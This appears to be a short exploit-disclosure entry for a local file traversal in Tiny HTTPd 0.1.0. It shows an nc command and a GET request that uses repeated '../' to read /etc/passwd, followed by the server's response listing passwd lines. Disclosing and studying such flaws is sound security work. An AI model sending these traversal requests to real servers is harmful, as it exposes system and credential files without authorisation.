33 lines
No EOL
896 B
Text
33 lines
No EOL
896 B
Text
#======================================================================================
|
|
# Exploit Author: Touhid M.Shaikh
|
|
# Exploit Title: Tiny HTTPd 0.1.0 Local File Traversal
|
|
# Date: 26-09-2017
|
|
# Website: www.touhidshaikh.com
|
|
# Vulnerable Software: Tiny HTTPd
|
|
# Version: 0.1.0
|
|
# Download Link:
|
|
https://sourceforge.net/projects/tinyhttpd/?source=directory
|
|
#======================================================================================
|
|
|
|
|
|
|
|
# To reproduce the exploit:
|
|
# 1. run the #./httpd
|
|
# 2. #nc localhost 44123
|
|
# GET /../../../../../../../../../../../etc/passwd HTTP/1.1
|
|
|
|
|
|
#==========
|
|
#Responce
|
|
#==========
|
|
|
|
|
|
HTTP/1.0 200 OK
|
|
Server: jdbhttpd/0.1.0
|
|
Content-Type: text/html
|
|
|
|
root:x:0:0:root:/root:/bin/bash
|
|
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
|
|
bin:x:2:2:bin:/bin:/usr/sbin/nologin
|
|
sys:x:3:3:sys:/dev:/usr/sbin/nologin
|
|
---------------------snip--------------------------- |